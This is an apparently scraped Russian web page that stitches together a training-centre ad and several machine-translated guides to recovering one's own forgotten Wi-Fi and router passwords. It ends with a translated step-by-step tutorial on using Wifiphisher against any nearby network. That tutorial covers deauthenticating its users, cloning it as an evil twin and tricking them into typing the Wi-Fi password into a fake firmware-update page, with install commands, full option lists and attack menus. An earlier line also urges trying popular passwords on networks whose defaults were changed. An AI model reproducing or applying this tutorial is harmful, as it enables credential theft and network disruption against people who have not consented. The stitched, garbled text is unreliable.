Мы принимаем к оплате:

«Подарочный сертификат» от нашего Учебного Центра – это лучший подарок для тех, кто Вам дорог! Оплате обучение и подарите Вашим родным и близким обучение по любому из курсов!!!

«Сертификат на повторное обучение» дает возможность повторно пройти обучение в нашем Учебном Центре со скидкой 1000 рублей!

А также:


Как снять пароль с wi fi роутера если забыл


Забыл пароль от роутера wifi. Как узнать, сменить, восстановить

Как узнать пароль от роутера или что делать если он безнадежно забыт? Все просто! Wi-fi уже давно и прочно стал частью жизни многих городски жителей. Немало людей уже не могут представить посещение общественного места, например, кафе, без возможности подключиться к интернету. Естественно, появляется желание иметь беспроводной доступ к сети и в домашних условиях. Это очень удобно, но есть вероятность столкнуться с типичной ситуацией, с которой, так или иначе, сталкивается, наверное, каждый — нужно подключить к интернету новый девайс, а пароль от маршрутизатора забыт. К счастью, эта проблема решаема.


Содержание:

Как узнать пароль от своего вай фай роутера если вы его забыли?

Чтобы пройти процедуру восстановления пароля Wi-fi, вам будет нужен один компьютер, подключённый ранее к нему.

  • Правой кнопкой мыши щёлкните на значок с подключённым вай-фай в правом, рядом с часами, нижнем углу монитора и среди появившихся пунктов выберите пункт «Центр управления сетями и общим доступом».
  • В появившемся окне нужно выбрать «Управления беспроводными сетями».
  • Когда вы увидите ещё одно появившееся окно, на необходимом соединении нужно нажать снова правой кнопкой вашей мышки и выбрать там «Свойства».
  • Внутри вкладки «Безопасность» в графе под названием «Ключ безопасности сети» вы обнаружите скрытый пароль. Чтобы увидеть его, нужно поставить галочку в графе «Отображать вводимые знаки», и он сразу станет вам виден.

Если нет ни одного компьютера, уже подключённого к сети, тогда нужно узнать пароль с помощью самого маршрутизатора.

  • Подсоедините роутер к вашему компьютеру при помощи идущего с ним в комплекте сетевого шнура.
  • В адресной строке любого браузера необходимо напечатать такой адрес — 192.168.1.1. Далее нужно будет заполнить графы с логином и паролем, что позволить получить доступ к настройкам. С огромной долей вероятности, это admin/admin.
  • Далее нужно перейти по следующим вкладкам — Wireless (Беспроводной режим) и Wireless Security (Защита беспроводного режима). В графе с названием PSK Password: (Пароль PSK:) вы увидите свой пароль. Возможно, он будет указан в какой-либо другой графе в этом же разделе. Если у вас маршрутизатор от фирмы Asus, то пароль вы увидите сразу на первой странице.

Стандартные пароли роутеров и маршрутизаторов

По умолчанию, в большинстве случаев, на вашем роутере будет установлен логин “admin” и аналогичный пароль “admin”. Но в некоторых моделях ситуация отличается. К примеру, в модели D-Link DI-804 поле пароля нужно будет оставить пустым при том же логине, а в модели Zyxel Prestige 650 логином и паролем будет набор цифр «1234».

Кстати, если выше приведенные пароли не подходят — значит его уже поменяли до вас, вот список самых популярных паролей, попробуйте их.

Как сбросить пароль от роутера на стандартный/заводсткой?

Если вы не помните логин и пароль от маршрутизатора, попробуйте ввести заводские. Если они не подошли, то придётся делать сброс. Сделать это очень просто. На каждом роутере вы найдёте маленькую кнопочку, обычно рядом с кнопкой включения, которую нужно нажать чем-нибудь острым (т.к. она очень маленькая) и подержать около 10 секунд.
После этого все логины/пароли/настройки сбросятся к заводским и вы можете пользоваться своим маршрутизатором. Но учтите, что придётся заново вносить и все настройки, которые были внесены ранее.

Узнали пароль от роутера Wi-Fi? Не забудьте посмотреть кто подключен к Вашему Wi-Fi и пользуется им бесплатно!

Как изменить пароль wifi роутера?

Для этой процедуры необходимо подключить маршрутизатор к компьютеру при помощи идущего с ним в комплекте кабеля.

  • Запустите ваш любимый браузер и в его адресной строке напечатайте 192.168.1.1;
  • Напечатайте в соответствующих графах свои логин и пароль, чтобы начать настраивать роутер в соответствующем разделе;
  • Зайдите в раздел Wireless и далее — Wireless Security;
  • Отметьте пункт WPA/WPA2;
  • Установите следующие настройки: Version должно иметь значение WPA2-PSK, а Encryption — Automatic;
  • В графе под названием PSK Password введите свой новый (измененный) пароль от wifi и нажмите Save;
  • После того, как маршрутизатор попросит перезагрузиться, нажмите ОК;
  • В появившейся красной надписи нажмите на синюю фразу «click here», и процесс смены пароля будет окончен.

После завершения процесса рекомендуется переподключить все приборы, ранее подключённые к вашему WiFi.

Еще 3 полезных статьи:

Как восстановить пароль для входа, если вы его забыли (новый логотип)?

Эта статья относится к:

TL-WR1043N (V5), Archer AX50 (V1), Archer AX10 (V1), Archer AX6000 (V1), Archer C59 (V2 V3), Archer C58 (V2), Archer A20 (V1 V3), Archer AX1800 (V1.20), Archer C900 (V1), Archer C80 (V1), Archer A6 (V2), Archer A7 (V5), Archer C60 (V2 V3), Archer C8 (V3) V4), Archer C9 (V4 V5), Archer C6 (V2), Archer C7 (V4 V5), Archer C5400 (V2), Archer C4000 (V2 V3), Archer C1900 (V2), Archer C1200 (V2 V3), Лучник C5400X (V1), Archer C2700 (V1), Archer AX20 (V1), Archer AX3000 (V1)

Эта функция позволяет восстановить пароль для входа, установленный для маршрутизатора, на случай, если вы его забудете. Если вы уже не можете войти на страницу управления, сбросьте настройки маршрутизатора до заводских значений по умолчанию.

Примечание:

Если вы используете TP-Link ID для входа на веб-страницу управления, функция восстановления пароля будет отключена. Для управления TP-Link ID перейдите в Basic> TP-Link Cloud.

1. Войдите в веб-интерфейс маршрутизатора. Если вы не знаете, как это сделать, обратитесь к

.

а. Как войти в веб-интерфейс маршрутизаторов Wi-Fi (новый логотип)?

г. Как войти в веб-интерфейс маршрутизаторов Wi-Fi (новый логотип)?

2.Перейдите в Advanced > System Tools > Administration и сосредоточьтесь на разделе Password Recovery .

3. Установите флажок Включить восстановление пароля .

4. Укажите почтовый ящик (От) для отправки письма о восстановлении и введите его адрес SMTP-сервера . Укажите почтовый ящик (To) для получения письма о восстановлении. Если почтовый ящик (От) для отправки письма о восстановлении требует шифрования, выберите Включить аутентификацию и введите его имя пользователя и пароль.

Советы: SMTP-сервер доступен для пользователей в большинстве систем веб-почты. Например, адрес SMTP-сервера Gmail - smtp.gmail.com. Вы можете обратиться к их странице справки, чтобы узнать адрес SMTP-сервера.

Обычно следует выбрать «Включить аутентификацию», если для входа в почтовый ящик требуется имя пользователя и пароль.

5. Щелкните Сохранить.

Вы можете нажать Test Email , чтобы проверить успешность настройки.

Чтобы восстановить пароль для входа в систему, посетите http://tplinkwifi.net, нажмите Забыли Пароль ? на странице входа и следуйте инструкциям, чтобы установить новый пароль.

Чтобы узнать больше о каждой функции и конфигурации, перейдите в Центр загрузок , чтобы загрузить руководство для вашего продукта.

.

Забыли пароль к беспроводной сети? Вот как восстановить пароли маршрутизатора Wi-Fi на Mac

Если вы когда-либо забыли пароль беспроводного маршрутизатора, будь то ваша собственная сеть или другая, вы, конечно же, не одиноки. Обычно вам достаточно ввести пароль один раз, сохранить его в связке ключей, и вы можете забыть о нем, верно? Что ж, это верно только до тех пор, пока вам снова не понадобится пароль, будь то для подключения к маршрутизатору с новым сетевым профилем, с нового устройства Mac или iOS, обмена им с другим человеком или для чего-то еще.Хорошая новость заключается в том, что на самом деле очень легко восстановить забытый пароль беспроводной сети с помощью встроенного инструмента Mac OS X, и мы покажем вам, как именно это сделать.


Вы сможете восстановить пароль любой беспроводной сети, к которой Mac подключился, используя этот метод, он хорошо работает во всех версиях MacOS и Mac OS X, что делает его весьма полезным.

Как восстановить забытый пароль беспроводной сети на Mac (работает со всеми паролями маршрутизаторов Wi-Fi и AirPort)

Прежде чем вы начнете, вам потребуется доступ к учетной записи администратора Mac, и вам потребуется имя беспроводного маршрутизатора или трансляции аэропорта, пароль от которого вы пытаетесь восстановить.А теперь приступим:

  1. Запустите «Связку ключей», расположенную в / Applications / Utilities / (Доступ к связке ключей можно легко получить из Spotlight с помощью Command + пробел)
  2. Отсортируйте список Связки ключей по «Имя» и найдите имя беспроводного маршрутизатора, к которому вы забыли пароль доступа, или воспользуйтесь полем «Поиск», чтобы сузить список сетей и результатов.
  3. Дважды щелкните имя маршрутизатора, сведения о котором вы хотите открыть для
  4. Установите флажок рядом с «Показать пароль»
  5. Введите пароль администратора, когда его спросят, и нажмите «Разрешить».
  6. Теперь появится пароль беспроводного доступа для использования

Фактически вы можете скопировать и вставить раскрытый пароль прямо из поля ввода для использования в другом месте, хотя оставлять любой пароль видимым в виде обычного текста надолго - плохая идея.

Когда вы закончите использовать раскрытый пароль, вы должны снять флажок и закрыть Связку ключей, чтобы он снова стал скрытым.

Это просто хорошая практика обеспечения безопасности, потому что оставлять данные для входа в открытый доступ не рекомендуется, даже если это просто точка доступа Wi-Fi.

Этот трюк особенно полезен, если вы используете очень сложные пароли и вам нужно ввести их на новом устройстве Mac или iOS, которое еще не подключено к той же сети, или если вам просто нужно передать данные для входа в маршрутизатор Wi-Fi на друг или коллега, чтобы они могли подключиться к Интернету.

Поскольку Mac хранит историю всех сетей, к которым он подключился, вы можете использовать его для получения пароля Wi-Fi в сетях, к которым вы не присоединились в течение нескольких месяцев (если не лет), при условии, что связка ключей остается нетронутой. Mac.

Мне приходилось использовать эту функцию много раз, когда я пытался вспомнить пароли маршрутизаторов, к которым у моего Mac был доступ в прошлом, но я просто не могу вспомнить.

Нужна дополнительная помощь по поводу других данных для входа? Вы можете ознакомиться с некоторыми другими статьями, связанными с восстановлением пароля, в том числе о том, как сбросить забытый пароль Mac и как обойти пароль прошивки Mac, если вы полностью заблокированы на Mac.

Связанные

.

Забыли пароль Wi-Fi? Выполните следующие действия, чтобы восстановить свой пароль

Люди постоянно забывают свои пароли, но если есть один тип пароля, который никто не пытается запомнить, это должен быть пароль Wi-Fi. Большинство людей настраивают сети Wi-Fi один раз, вводят пароль на всех своих устройствах и полностью забывают о нем. Пока вы не купите новый телефон или гость не захочет получить доступ к сети на своем смартфоне - вот когда следует лихорадочный поиск пароля Wi-Fi, прежде чем отказаться и сбросить настройки беспроводного маршрутизатора.Прежде чем вы пойдете по этому пути, вот несколько советов, как восстановить сохраненные пароли Wi-Fi.

Обратите внимание, что это не руководство по взлому сетей Wi-Fi. Это незаконно и может привести к гораздо более серьезным неприятностям, чем вы, вероятно, думаете. Эти шаги предназначены только для восстановления вашего собственного пароля Wi-Fi и невозможны, если у вас еще нет доступа к сети на одном из ваших устройств. Если вы забыли пароль своей сети Wi-Fi, выполните следующие действия, чтобы восстановить его.

Как восстановить забытый пароль Wi-Fi в Windows

Хотя вы можете встретить несколько приложений, которые утверждают, что позволяют восстанавливать сохраненные пароли Wi-Fi, на ПК с Windows они не нужны.Даже если у вас нет прав администратора на вашем компьютере, вы можете найти пароль Wi-Fi, выполнив следующие действия. Обратите внимание, что этот метод работает только в том случае, если для безопасности установлено значение «Личный» - если вы подключены к корпоративной сети, такой как офисный Wi-Fi, этот метод не будет отображать пароль.

  1. Используя компьютер, подключенный к рассматриваемой сети Wi-Fi, перейдите в Пуск> Панель управления> Центр управления сетями и общим доступом . На компьютерах с Windows 8 вы можете нажать Windows key + C , нажать Search и найти Network and Sharing Center .
  2. Щелкните Изменить настройки адаптера на левой боковой панели.
  3. Щелкните правой кнопкой мыши используемую сеть Wi-Fi и выберите Status .
  4. Щелкните Свойства беспроводной сети .
  5. 5. Щелкните вкладку Безопасность .
  6. 6. Теперь вы увидите название сети Wi-Fi и скрытый пароль. Установите флажок Показать символы , чтобы открыть сохраненный пароль.

Альтернативный метод включает установку стороннего приложения, которое обнаруживает пароли WiFi, хранящиеся на вашем компьютере.Выполните следующие действия:

  1. Загрузите и установите WiFi Password Revealer. Программа установки попытается заставить вас установить Skype и AVG TuneUp, поэтому мы предлагаем вам снять эти флажки во время процесса установки.
  2. Запустите программу, когда установка будет завершена.
  3. Теперь вы сможете увидеть все имена сетей Wi-Fi и их сохраненные пароли. Вам не нужно ничего делать, кроме запуска программы, чтобы увидеть эти SSID и пароли Wi-Fi.

Как восстановить забытый пароль Wi-Fi на Mac

Вы можете найти сохраненные пароли Wi-Fi через приложение Keychain Access на Mac.Вот как.

  1. Перейдите к / Applications / Utilities .
  2. Открыть Связка ключей . Перейдите к связке ключей System , указанной в списке Keychains в верхнем левом углу.
  3. Найдите сеть Wi-Fi, для которой вы пытаетесь найти пароль, введя имя сети (SSID) в поле поиска в правом верхнем углу или вручную найдя ее в списке.
  4. Дважды щелкните имя сети и в появившемся поле установите флажок Показать пароль .
  5. Введите пароль учетной записи пользователя при появлении запроса, и вам будет показан сохраненный пароль Wi-Fi в виде открытого текста.

Как восстановить забытый пароль Wi-Fi через маршрутизатор

Если у вас нет компьютера Windows или Mac, на котором сохранены учетные данные Wi-Fi, или если вы пытаетесь сделать это это с вашим телефоном или планшетом, вы все равно можете попытаться найти сохраненный пароль Wi-Fi через маршрутизатор. Очевидно, это будет работать только в том случае, если вы подключены к сети маршрутизатора - помните, что вы также можете подключиться к маршрутизатору с помощью кабеля Ethernet.Планшеты и мобильные телефоны не могут двигаться дальше, если они уже не подключены к сети Wi-Fi.

Шаги могут немного отличаться в зависимости от маршрутизатора. Изменение неправильных настроек здесь может испортить беспроводную сеть для всех, поэтому действуйте на свой страх и риск.

  1. Сначала откройте браузер и перейдите на локальный адрес маршрутизатора - обычно это http://192.168.1.1, но URL-адрес зависит от марки маршрутизатора, поэтому проверьте руководство (или официальный веб-сайт), чтобы найти правильный адрес.
  2. Введите имя пользователя и пароль. Опять же, это зависит от производителя, и вы также можете и должны изменить пароли. Однако по умолчанию на маршрутизаторах, предоставляемых как MTNL, так и Airtel, имя пользователя и пароль - «admin» без кавычек (у других маршрутизаторов часто используется «пароль» без кавычек в качестве пароля по умолчанию). Если эти комбинации не работают, обратитесь к производителю маршрутизатора или интернет-провайдеру.
  3. Щелкните Internet , а затем щелкните Wireless .В некоторых маршрутизаторах опция Wireless может быть видна на главном экране. В этом разделе вы увидите тип безопасности (WEP, WPA и т. Д.) И ключ. Некоторые маршрутизаторы могут иметь эти параметры на вкладке «Безопасность».

Поле рядом с полем ключа содержит пароль для сети Wi-Fi. На многих маршрутизаторах это обычный текст, поэтому вы можете просто записать его.

Если ничего не помогает ...

Возможно, вам придется перезагрузить маршрутизатор, если ничего не работает.Не делайте этого, если вы просто не можете подключиться к сети с помощью любого устройства. Сброс маршрутизатора - это крайний шаг, и вам придется перенастроить сеть, чтобы восстановить подключение к Интернету. Если вы не знаете, как это сделать, мы рекомендуем вам обратиться за помощью к своему интернет-провайдеру.

Мы не можем дать вам подробное пошаговое руководство по этому вопросу, потому что оно может немного отличаться в зависимости от марки маршрутизатора. Перед тем, как сделать это, вы должны проверить руководство пользователя вашего маршрутизатора.Каждый маршрутизатор имеет переключатель сброса. У некоторых маршрутизаторов есть крошечная кнопка, в то время как на других маршрутизаторах эта кнопка спрятана в крошечном отверстии (которое можно нажать с помощью скрепки). Этот переключатель необходимо нажать на несколько секунд, чтобы маршрутизатор перезагрузился. Мигающие индикаторы на маршрутизаторе сообщат вам, что он был сброшен. Как только это будет сделано, дождитесь перезагрузки и перенастройте сеть. Точные шаги для этого процесса также будут различаться в зависимости от вашего интернет-провайдера, поэтому мы рекомендуем обратиться к вашему интернет-провайдеру, если вам нужно сбросить настройки беспроводного маршрутизатора, если вы точно не знаете, что делаете.

Вот как вы можете восстановить сохраненные или забытые пароли Wi-Fi. Если вы знаете какие-либо другие простые методы, которые сработали для вас, сообщите нам об этом в комментариях. Для получения дополнительных руководств посетите наш раздел «Как сделать».

.

Получите чей-либо пароль Wi-Fi без взлома с помощью Wifiphisher «Null Byte :: WonderHowTo

В то время как взлом пароля и атаки PIN-кода установки WPS привлекают много внимания, атаки социальной инженерии - безусловно, самый быстрый способ получения пароля Wi-Fi. Одной из самых мощных атак социальной инженерии Wi-Fi является Wifiphisher, инструмент, который блокирует Интернет до тех пор, пока отчаявшиеся пользователи не вводят пароль Wi-Fi, чтобы включить обновление прошивки поддельного маршрутизатора.

Атаки социальной инженерии являются мощными, потому что они часто полностью обходят защиту.Если вы можете обманом заставить сотрудника ввести пароль на поддельную страницу входа в систему, не имеет значения, насколько надежен пароль. Это противоположно атакам взлома, когда вы используете вычислительную мощность компьютера, чтобы быстро попробовать гигантский список паролей. Но вы не сможете добиться успеха, если пароль, который вы атакуете, безопасен и не включен в ваш список паролей.

Незнание того, насколько надежен пароль, на который вы нападаете, может расстраивать, потому что инвестирование времени и вычислительной мощности, задействованных в атаке по словарю или грубой силе, может сделать бессмысленную атаку огромной тратой ресурсов.Вместо этого такие инструменты, как Wifiphisher, задают вопросы о людях, стоящих за этими сетями.

Знает ли средний пользователь, как выглядит страница входа в систему его Wi-Fi роутера? Заметили бы они, если бы все было иначе? Что еще более важно, будет ли занятый пользователь, отключенный от Интернета и находящийся в состоянии стресса из-за сбоя, все равно будет вводить свой пароль, чтобы включить поддельное обновление, даже если они заметят, что страница входа выглядит немного иначе?

Вифифишер считает, что ответ - «да». Инструмент может выбрать любую ближайшую сеть Wi-Fi, деаутентифицировать всех пользователей (заблокировать ее) и создать клонированную точку доступа, для присоединения которой не требуется пароль.Любой пользователь, который подключается к открытой сети, похожей на злого близнеца, получает убедительно выглядящую фишинговую страницу, требующую пароль Wi-Fi для обновления прошивки, что объясняется как причина, по которой Wi-Fi перестал работать.

Обновление прошивки из ада

Для цели атаки социальной инженерии первые признаки Wifiphisher выглядят как проблема с маршрутизатором. Сначала отключается Wi-Fi. Они по-прежнему видят сеть, но все попытки подключиться к ней сразу же терпят неудачу.Другие устройства также не могут подключиться к сети, и они начинают замечать, что не только одно устройство, но и каждое устройство Wi-Fi потеряло соединение с сетью.

Вот когда они замечают новую сеть с тем же именем, что и старая сеть, но не требующая пароля. После еще нескольких попыток присоединиться к защищенной сети они присоединяются к открытой сети из опасений, что их маршрутизатор внезапно транслирует сеть без пароля, к которой может присоединиться любой желающий. Как только они присоединяются, открывается официальная веб-страница с упоминанием производителя их маршрутизатора и информирует их о том, что маршрутизатор подвергается критическому обновлению прошивки.Пока они не введут пароль для применения обновления, интернет не будет работать.

После ввода сверхзащищенного пароля Wi-Fi экран загрузки начинает ползать по экрану при перезапуске маршрутизатора, и они немного гордятся тем, что серьезно отнеслись к безопасности своего маршрутизатора, установив это критическое обновление. Через минуту ожидания их устройства повторно подключаются к сети, теперь они более безопасны благодаря установленному обновлению.

Easy Access with Bossy Update

Для хакера получить пароли так же просто, как выбрать, на какую сеть вы хотите нацелить.После определения цели Wifiphisher немедленно блокирует все устройства, подключенные к сети, увеличивая вероятность того, что кто-то, подключенный к сети, расстроится и применит поддельное обновление. Затем информация о сети клонируется, и ложная сеть Wi-Fi транслируется, чтобы цель думала, что их маршрутизатор работает в каком-то неопределенном режиме обновления.

Устройства, подключающиеся к сети, сразу же заносятся в список, а фишинговая страница настраивается на соответствие производителю маршрутизатора путем считывания первой части MAC-адреса маршрутизатора.После обмана любой из целей, подключенных к целевой сети, для ввода пароля, Wifiphisher информирует хакера, пока не торопится. После отправки захваченного пароля цель жестоко занята как фальшивым экраном загрузки обновлений, так и фальшивым таймером перезагрузки, чтобы выиграть время для хакера, чтобы проверить захваченный пароль.

Что вам понадобится

Чтобы эта атака сработала, вам понадобится совместимый с Kali Linux адаптер беспроводной сети. Если вы не уверены, что выбрать, ознакомьтесь с одним из наших руководств по выбору того, которое поддерживает режим монитора и внедрение пакетов, по ссылке ниже.

Слева направо, начиная сверху: Alfa AWUS036NH; Альфа AWUS051NH; TP-LINK TL-WN722N; Альфа AWUS036NEH; Panda PAU05; Alfa AWUS036H; Альфа AWUS036NHA. Image by Kody / Null Byte

Помимо хорошего беспроводного сетевого адаптера, вам понадобится компьютер под управлением Kali Linux, который вы должны сначала обновить, запустив apt update и apt upgrade . Если вы этого не сделаете, вы, скорее всего, столкнетесь с проблемами в процессе установки Wifiphisher ниже.

Шаг 1. Установка Wifiphisher

Для начала мы можем открыть окно терминала и ввести apt install wifiphisher , чтобы установить Wifiphisher.

  ~ # apt install wifiphisher Чтение списков пакетов ... Готово Построение дерева зависимостей Чтение информации о состоянии ... Готово wifiphisher - это уже самая новая версия (1.4 + git20191215-0kali1). Следующие пакеты были установлены автоматически и больше не требуются: dh-python libdouble-conversion1 liblinear3 Используйте apt autoremove, чтобы удалить их. 0 обновлено, 0 установлено заново, 0 удалено и 1891 не обновлено.  

Если вы хотите попробовать установить его из репозитория GitHub, вы можете сделать это, клонировав репозиторий и следуя инструкциям на странице GitHub, например:

  ~ # git clone https: // github.com / wifiphisher / wifiphisher.git ~ # cd wifiphisher ~ # sudo python setup.py install  

Это должно установить Wifiphisher, который с этого момента вы можете начать, просто набрав имя программы в окне терминала.

Шаг 2. Просмотрите флаги Wifiphisher

У вас должна быть возможность запустить сценарий в любое время, просто набрав sudo wifiphisher в окне терминала. Хотя у Wifiphisher нет справочной страницы, на странице --help вы можете увидеть довольно внушительный список параметров конфигурации, которые вы можете изменить, добавив к команде различные флаги.

  ~ # wifiphisher --help использование: wifiphisher [-h] [-i ИНТЕРФЕЙС] [-eI EXTENSIONSINTERFACE] [-aI АПИНТЕРФЕЙС] [-iI ИНТЕРНЕТИНТЕРФЕЙС] [-iAM MAC_AP_INTERFACE] [-iEM MAC_EXTENSIONS_INTERFACE] [-iNM] [-kN] [-nE] [-nD] [-dC DEAUTH_CHANNELS [DEAUTH_CHANNELS ...]] [-e ESSID] [-dE DEAUTH_ESSID] [-p PHISHINGSCENARIO] [-pK PRESHAREDKEY] [-hC HANDSHAKE_CAPTURE] [-qS] [-lC] [-lE LURE10_EXPLOIT] [--logging] [-dK] [-lP LOGPATH] [-cP CREDENTIAL_LOG_PATH] [--payload-path PAYLOAD_PATH] [-cM] [-wP] [-wAI WPSPBC_ASSOC_INTERFACE] [-kB] [-fH] [-pPD PHISHING_PAGES_DIRECTORY] [--dnsmasq-conf DNSMASQ_CONF] [-pE PHISHING_ESSID] необязательные аргументы: -h, --help показать это справочное сообщение и выйти -i ИНТЕРФЕЙС, --interface ИНТЕРФЕЙС Вручную выберите интерфейс, поддерживающий как AP, так и режимы мониторинга для создания мошеннической точки доступа, а также проведение дополнительных атак Wi-Fi от расширений (я.е. деаутентификация). Пример: -i wlan1 -eI EXTENSIONSINTERFACE, --extensionsinterface EXTENSIONSINTERFACE Вручную выберите интерфейс, поддерживающий монитор режим деаутентификации жертв. Пример: -eI wlan1 -aI APINTERFACE, --apinterface APINTERFACE Вручную выберите интерфейс, поддерживающий режим AP для порождает мошенническую AP. Пример: -aI wlan0 -iI ИНТЕРНЕТИНТЕРФЕЙС, --интернет-интерфейс ИНТЕРНЕТИНТЕРФЕЙС Выберите интерфейс, подключенный к Интернет Пример: -iI ppp0 -iAM MAC_AP_INTERFACE, --mac-ap-interface MAC_AP_INTERFACE Укажите MAC-адрес интерфейса AP -iEM MAC_EXTENSIONS_INTERFACE, --mac-extensions-interface MAC_EXTENSIONS_INTERFACE Укажите MAC-адрес интерфейса расширений -iNM, --no-mac-randomization Не меняйте MAC-адрес -kN, --keepnetworkmanager Не убивайте NetworkManager -nE, --noextensions Не загружать расширения.-nD, --nodeauth Пропустить этап деаутентификации. -dC DEAUTH_CHANNELS [DEAUTH_CHANNELS ...], --deauth-channels DEAUTH_CHANNELS [DEAUTH_CHANNELS ...] Каналы на деаутентификацию. Пример: --deauth-channels 1,3,7 -e ESSID, --essid ESSID Введите ESSID мошеннической точки доступа. Этот вариант пропустит этап выбора точки доступа. Пример: --essid «Бесплатный Wi-Fi» -dE DEAUTH_ESSID, --deauth-essid DEAUTH_ESSID Деаутентифицируйте все BSSID в WLAN с этим ESSID.-p PHISHINGSCENARIO, --phishingscenario PHISHINGSCENARIO Выберите сценарий фишинга для запуска. пропустить этап выбора сценария. Пример: -p Обновление прошивки -pK PRESHAREDKEY, --presharedkey PRESHAREDKEY Добавьте защиту WPA / WPA2 на несанкционированную точку доступа. Пример: -pK s3cr3tp4ssw0rd -hC HANDSHAKE_CAPTURE, --handshake-capture HANDSHAKE_CAPTURE Захват рукопожатий WPA / WPA2 для проверки пароль Пример: -hC capture.pcap -qS, --quitonsuccess Остановить скрипт после успешного получения одной пары полномочий -lC, --lure10-capture Захват BSSID обнаруженных точек доступа на этапе выбора точки доступа. Эта опция является частью Lure10 атака. -lE LURE10_EXPLOIT, --lure10-exploit LURE10_EXPLOIT Обманите службу определения местоположения Windows в соседней Windows пользователи считают, что он находится в области, которая была ранее захваченный с помощью --lure10-capture.Часть Lure10 атака. - ведение журнала активности в файл -dK, --disable-karma Отключает атаку KARMA -lP LOGPATH, --logpath LOGPATH Определите полный путь к файлу журнала. -cP CREDENTIAL_LOG_PATH, --credential-log-path CREDENTIAL_LOG_PATH Определите полный путь к файлу, который будет хранить любые захваченные учетные данные --payload-путь PAYLOAD_PATH Путь полезной нагрузки для сценариев, обслуживающих полезную нагрузку -cM, --channel-monitor Следите за тем, чтобы целевая точка доступа меняла канал.-wP, --wps-pbc Следить за тем, чтобы кнопка на регистраторе WPS-PBC нажал. -wAI WPSPBC_ASSOC_INTERFACE, --wpspbc-assoc-interface WPSPBC_ASSOC_INTERFACE Интерфейс WLAN, используемый для подключения к WPS. Точка доступа. -kB, --known-beacons Транслировать рекламные кадры ряда маяков популярные WLAN -fH, --force-hostapd Принудительно использовать hostapd, установленный в системе -pPD PHISHING_PAGES_DIRECTORY, --phishing-pages-directory PHISHING_PAGES_DIRECTORY Искать фишинговые страницы в этом месте --dnsmasq-conf DNSMASQ_CONF Определите полный путь к настраиваемому dnmasq.conf файл -pE PHISHING_ESSID, --phishing-essid PHISHING_ESSID Определите ESSID, который вы хотите использовать для фишинга стр.  

Шаг 3. Подключите адаптер беспроводной сети

Теперь пора подготовить адаптер беспроводной сети, подключив его. Wifiphisher переведет вашу карту в режим беспроводного монитора, если вы этого не сделаете сами.

Хороший адаптер дальнего действия на Amazon: USB-адаптер Alfa AWUS036NHA Wireless B / G / N - 802.11n - 150 Мбит / с - 2,4 ГГц - 5 дБи Антенна

Шаг 4: Запуск сценария

Я собираюсь использовать свой беспроводной сетевой адаптер USB, поэтому я добавлю к команде флаг -i и добавьте имя моего сетевого адаптера. Если я этого не сделаю, Wifiphisher просто возьмет любой сетевой адаптер, какой сможет.

Чтобы запустить сценарий, я выполню следующую команду.

  ~ # wifiphisher -i wlan1  

После этого мы должны увидеть страницу со всеми ближайшими сетями.Здесь мы можем выбрать, какую сеть мы хотим атаковать, и нажать Введите .

  Опции: [Esc] Выйти [Стрелка вверх] Переместить вверх [Стрелка вниз] Переместить вниз ESSID BSSID CH PWR ENCR КЛИЕНТЫ ВЕНДОР _________________________________________________________________________________________ │ Команда исследователей CIC.m ██████████████ ███ 100% ОТКРЫТО 0 Неизвестно │ │ ██████████████ ██████████████ ███ 100% WPA2 2 Belkin International │ │ █████████████ ██████████████ ███ 98% WPA2 0 Неизвестно │ │ █████████████████ ██████████████ ███ 94% WPA2 6 Arris Group │ │ ████████████ ██████████████ ███ 86% WPA2 / WPS 1 Неизвестно │ │ █████████████ ██████████████ ███ 78% WPA2 / WPS 3 Belkin International │ │ ███████████ ██████████████ ███ 78% WPA2 / WPS 0 Asustek Computer │ │ ████████████ ██████████████ ███ 78% WPA2 / WPS 4 Hon Hai Precision Ind.│ │ █████████████████ ██████████████ ███ 74% WPA2 / WPS 0 Hon Hai Precision Ind. │ │ ████████████ ██████████████ ███ 74% WPA2 0 Неизвестно │ │ █████████████ ██████████████ ███ 74% WPA2 / WPS 2 Technicolor CH USA │ │ ████████████ ██████████████ ███ 70% WPA2 / WPS 1 Technicolor CH USA │ │ ███████████ ██████████████ ███ 70% WPA2 0 Неизвестно │ │ █████████████ ██████████████ ███ 90% WPA2 0 Неизвестно │ │ ████████████ ██████████████ ███ 66% WPA2 0 Неизвестно │ │ ████████████ ██████████████ ███ 66% WPA2 / WPS 0 Hon Hai Precision Ind.│ │ ████████████ ██████████████ ███ 62% WPA2 / WPS 2 Asustek Computer │ │ ███████████████ ██████████████ ███ 62% WPA2 / WPS 3 Неизвестно │ │ █████████████ ██████████████ ███ 62% WPA2 / WPS 0 Hon Hai Precision Ind. │ │ ████████████ ██████████████ ███ 58% WPA2 / WPS 0 Hon Hai Precision Ind. │ │ █████████████ ██████████████ ███ 58% WPA2 / WPS 0 Неизвестно │ │ ████████████████ ██████████████ ███ 58% WPA2 0 Неизвестно │ │ █████████████ ██████████████ ███ 58% WPA2 / WPS 0 Hon Hai Precision Ind.│ │ ██████████ ██████████████ ███ 54% WPA2 / WPS 0 Группа Arris │ │ ██████████ ██████████████ ███ 46% WPA2 0 Технологии Tp-link │ │ █████████████████ ██████████████ ███ 46% WPA2 / WPS 0 Asustek Computer │ —————————————————————————————————————————————————— ———————————————————————————————————————  

Далее скрипт спросит, какая атака ты хочешь бежать. Выберите вариант 2.

  Параметры: [Esc] Выйти [Стрелка вверх] Переместить вверх [Стрелка вниз] Переместить вниз Доступные сценарии фишинга: 1 - Network Manager Connect Имитирует поведение сетевого администратора.В этом шаблоне отображается страница Chrome «Ошибка подключения» и окно диспетчера сети через страницу с запросом предварительного общего ключа. В настоящее время поддерживаются сетевые диспетчеры Windows и MAC OS. 2 - Страница обновления прошивки Страница конфигурации маршрутизатора без логотипов или брендов, запрашивающая пароль WPA / WPA2 из-за обновления прошивки. Подходит для мобильных устройств. 3 - Страница входа в OAuth Бесплатная служба Wi-Fi, запрашивающая учетные данные Facebook для аутентификации с помощью OAuth. 4 - Обновление плагина браузера Общая страница обновления подключаемого модуля браузера, которая может использоваться для передачи полезных данных жертвам. 

После выбора атаки сразу запустится. Откроется страница для отслеживания целей, присоединяющихся к сети. Wifiphisher также будет прослушивать устройства, пытающиеся подключиться к сетям, которых нет, и будет создавать поддельные версии, чтобы заманить эти устройства для подключения.

  Канал расширений: │ Wifiphisher 1.4GIT DEAUTH / DISAS - ██████████████████ │ ESSID: DEAUTH / DISAS - ██████████████████ │ Канал: 11 │ Интерфейс AP: wlan1 │ Варианты: [ESC] Выйти │ _________________________ Связанные жертвы: Запросы HTTPS:  

После того, как цель присоединится, всплывающее окно потребует ввести пароль.

